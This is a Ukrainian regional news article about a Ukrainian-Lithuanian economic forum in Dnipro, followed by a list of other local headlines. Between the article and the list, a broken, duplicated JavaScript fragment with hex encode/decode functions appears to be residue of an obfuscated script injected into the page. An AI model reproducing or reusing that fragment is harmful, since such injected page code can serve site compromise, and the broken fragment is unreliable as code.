27 Май, 17:35

Економічний форум у Дніпрі зібрав під одним дахом 12 провідних литовських компаній та 80 українських бізнесменів (ВІДЕО)

2 дні розмов про бізнес. Дводенний україно-литовський економічний форум стартував у приміщенні облдержадміністрації. Основна мета – залучити нові інвестиції до Дніпропетровщини. Заохочують посадовці статистичними даними. Наша область — джерело п’ятої частини промислової продукції та майже чверті прибутків України від приватних підприємств. 

Наразі на території Дніпропетровщини власні інвестиції має 61 країна. Найбільші — Німеччина, Сполучені Штати, Швейцарія та Польща. До гігантів інвестування адміністрація області взялася долучити і Литву. Економічний форум зібрав під одним дахом 12 провідних литовських компаній та 80 українських бізнесменів. Перший день — зустріч з послом прибалтійської країни, другий – з представником Сейму і депутатами парламенту. На порядку денному питань до обговорення– безліч.

Олег Кужман, перший заступник голови Дніпропетровської ОДА: «Мы даже сегодня говорим о каком-то совместном патриотическом воспитании нашей молодёжи. То есть иностранный инвестор сегодня боится ехать в Украину, потому что идёт война. Мы хотим показать, что Днепропетровская область стабильна, здесь дети ходят в школы – сегодня последний звонок, что у нас прекрасная наука, что у нас хорошие высшие учебные заведения. И вот этот обмен позволит нашим молодым людям стать европейцами».

Економічна відповідність європейським вимогам – одне із додаткових питань форуму. Литовці пообіцяли: відкриють секрети фінансового розвитку та поділяться досвідом. Захід став не лише зустріччю бізнесменів. У його рамках облдержадміністрація відкрила декілька тематичних секцій.

Олег Кужман, перший заступник голови Дніпропетровської ОДА: «Секции будут работать по направлениям. То есть это архитектура, строительство, производство, это энергосберегающие технологии, это аграрный сектор, это наука и культура, это здравоохранение — то бишь куда сегодня можно вложить ресурсы в Днепропетровской области».

У рамках секції «Освіта і наука» відбулась презентація поточних програм Литовського університету етикології. Понад півсотні дніпровських викладачів та професорів уже намітили для своїх вишів цікаві проекти. Тепер вирішують, чи втілити їх протягом року самостійно, чи одразу долучитися до спільної реалізації з литовськими колегами.

Ірина Шумік, начальник науки і вищої освіти департаменту освіти і науки ОДА: «Бізнес просто неможливий без освіти. Давайте говорити відверто: якщо ми не будемо готувати висококваліфікованих фахівців, то бізнес просто не буде розвиватися. Я сподіваюсь, що дана зустріч дасть подальший поштовх до того, щоб налагодити співпрацю і міжнародний обмін разом з  цим університетом, і, можливо, студентських обмінів, і розвитку програми подальшої «Еразмус», «Еразмус Плюс».

Надалі подібні форуми в ОДА сподіваються провести с представниками Німеччини та Польщі.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «9-channel.com»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "9-channel.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Вибір редакції

Прогноз погоди на 19 та 20 січня. Дніпро і область (ВІДЕО)

18 Январь, 18:43
На Дніпропетровщині розслідують загадкову смерть пенсіонерки (КОМЕНТАР)

На Дніпропетровщині розслідують загадкову смерть пенсіонерки, тіло якої знайшли без голови та руки знайшли в одному з дачних кооперативів. Особу

17 Январь, 22:15
Прогноз погоди на п’ятницю, 18 січня. Дніпро і область (ВІДЕО)

17 Январь, 18:54
Змагання юних винахідників “Роботрафік-2019” пройшли у Дніпрі (ВІДЕО)

Знання правил дорожнього руху і робототехніки! 17-го січня в Дніпрі пройшли обласні змагання юних винахідників “Роботрафік-2019”. У конкурсі взяли участь

17 Январь, 18:16
В Україні створять реєстр соціальних послуг

В Україні буде створено реєстр соціальних послуг. Верховна Рада України прийняла у другому читанні законопроект "Про соціальні послуги". За законопроект

17 Январь, 17:06
У Дніпрі відзначили найкращі проекти ОСМД (КОМЕНТАР)

Нові труби, вікна, дахи та опалення - 16 січня в Дніпрі відзначили найкращі проекти багатоквартирних кооперативних об*єднань міста. За плідну

16 Январь, 22:58
Буккросинг в дитсадку: команда ДніпроОДА вже 3 роки впроваджує освітню ініціативу (ВІДЕО)

Різнокольорові полички чергової буккросинг-зони красуються вже і в коридорі дитячого садочку №311 у Дніпрі. По області таких — більше 60.

16 Январь, 18:27
Прогноз погоди на 17 січня, четвер. Дніпро і область (ВІДЕО)

16 Январь, 18:22